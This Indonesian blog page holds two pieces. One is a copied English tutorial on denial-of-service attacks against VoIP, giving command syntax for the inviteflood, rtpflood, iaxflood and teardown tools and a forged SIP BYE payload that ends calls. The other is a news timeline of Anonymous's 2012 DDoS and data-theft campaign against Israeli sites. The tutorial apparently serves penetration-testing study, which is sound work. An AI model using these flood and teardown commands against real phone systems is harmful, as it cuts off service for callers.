BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.

Template Bintik Sliding


  1. Mempunyai Feature Reply (Balas Komentar)
  2. Menampilkan Breadcrumbs di Hasil Pencarian Google
  3. Menampilkan Star di Hasil Pencarian Google
  4. Loading blog Ringan
  5. Bisa buat Costum Posting
  6. Mempunya Sidebar 3 Colom di Bawah
  7. Dan Masih Banyak Lagi.


 DOWNLOAD
Copas Sertakan Sumber. 
Posted By Admin: Syafri
Contact Fb:Fb Admin

Denial Of Service

A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let’s take a quick overview of the tools available in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
              June 09, 2006
 Usage:
 Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
 Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort  (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets


Sip 35.png


As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID


Sip 36.png

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Sip 37.png

Teardown

Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0


Sip 38.png


If you specify the “-v” option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>


Sumber http://hoznimonzter.blogspot.com

Kronologis Serangan Anonymous ke Israel

Sidoarjo_Hacking - Serangan udara Israel ke jalur Gaza dikecam banyak pihak. Di dunia maya, kelompok hacker Anonymous pun mengutuk aksi biadab negara zionis tersebut, bahkan mereka melakukan perlawanan atas nama kemanusiaan.

Bermula dari kecaman yang ternyata tak digubris oleh pemerintah Israel, membuat kelompok yang selalu menggunakan topeng khas bila muncul ke dunia nyata itu geram, sehingga melakukan aksi penyerangan.

Berikut kronologis serangan Anonymous terhadap sejumlah situs Israel.
 
14 November 2012

Para pengunjuk rasa yang mengaku menjadi bagian dari gerakan Anonymous mengecam serangan 14 November oleh militer Israel terhadap pimpinan Hamas yang diduga bertanggung jawab atas ratusan serangan roket terhadap warga sipil Israel.

Dalam sebuah pernyataan online, Anonymous memperingatkan Israel Defense Force (IDF) -- militer Israel -- untuk tidak untuk memotong akses online warga Palestina di Gaza untuk mendapatkan pesan ke dunia, meskipun tidak jelas apakah IDF benar-benar untuk melakukannya. 

"Untuk rakyat Gaza dan wilayah pendudukan, kami Anonymous berada di samping Anda untuk bertarung," kata pernyataan itu. 

"Kami akan melakukan segalanya dalam kekuasaan kami untuk menghambat kekuatan jahat IDF yang tersusun terhadap Anda. Kami akan menggunakan semua sumber daya kami untuk memastikan Anda tetap terhubung ke Internet dan tetap dapat mengirimkan pengalaman Anda ke seluruh dunia."

Protes secara online yang dijuluki 'OpIsrael' datang setelah Israel melancarkan serangan terhadap pemimpin Hamas di Gaza sebagai pembalasan atas rudal yang dikirimkan beberapa hari terakhir. Hamas telah meluncurkan lebih dari 500 roket dan rudal ke wilayah Israel pada tahun 2012, menurut statistik yang dikumpulkan oleh pemerintah Israel.

15 November 2012

Pagi hari di 15 November 2012, sebuah postingan diduga dari pendukung Anonymous mengkritik Israel karena serangan yang brutal. Pada saat yang sama, Anonymous mulai melakukan serangan berbasis denial-of-service (DDoS).

Serangan pertama ini mulai menargetkan website dari Angkatan Pertahanan Israel dan kantor Perdana Menteri serta bank Israel, maskapai penerbangan dan perusahaan infrastruktur.

Pada tanggal yang sama, anggota gerakan ini melunak. Mereka mengaku tidak pada pihak manapun dari konflik ini.

"Anonymous tidak mendukung kekerasan oleh IDF atau Perlawanan Palestina / Hamas. Perhatian kami adalah untuk anak-anak Israel dan Wilayah Palestina dan hak-hak orang-orang di Gaza untuk menjaga jalur komunikasi yang terbuka dengan dunia luar."

17 November 2012

Kelompok Anonymous kembali kobarkan pernyataan cyberwar terhadap Israel melalui sebuah postingan video YouTube yang diupload tertanggal 17 November 2012. Di video tersebut, salah seorang yang diduga Anonymous tersebut mengucapkan janji akan menyerang Israel, bila negara tersebut belum berhenti membombardir Gaza.

Dalam pesan yang diklaim merupakan Anonymous Collective, kelompok itu berjanji akan melakukan segala upaya untuk melumpuhkan sistem internet Israel, mulai dari hack, deface, docks, hijack, mencuri informasi di database, mengambil alih admin dan mematikan DNS.

19 November

Sampai Senin (19/11), Anonymous mengklaim telah meretas ratusan situs yang berbasis di Israel. Tidak hanya itu, Anonymous juga dilaporkan telah mencuri email dan password, serta database krusial dari Bank Jerusalem dan Kementerian Luar Negeri Israel.

Anonymous mengaku telah menangguk sejumlah data sensitif. Di antaranya berisi lebih dari 3.000 data individu yang telah mendonasikan uangnya untuk kelompok pro Israel, Unity Coalition for Israel.

Data-data tersebut ditemukan Anonymous pasca memborbardir hampir 700 situs milik Israel dan menguras sejumlah database situs-situs yang diacak-acaknya tersebut.

SUMBER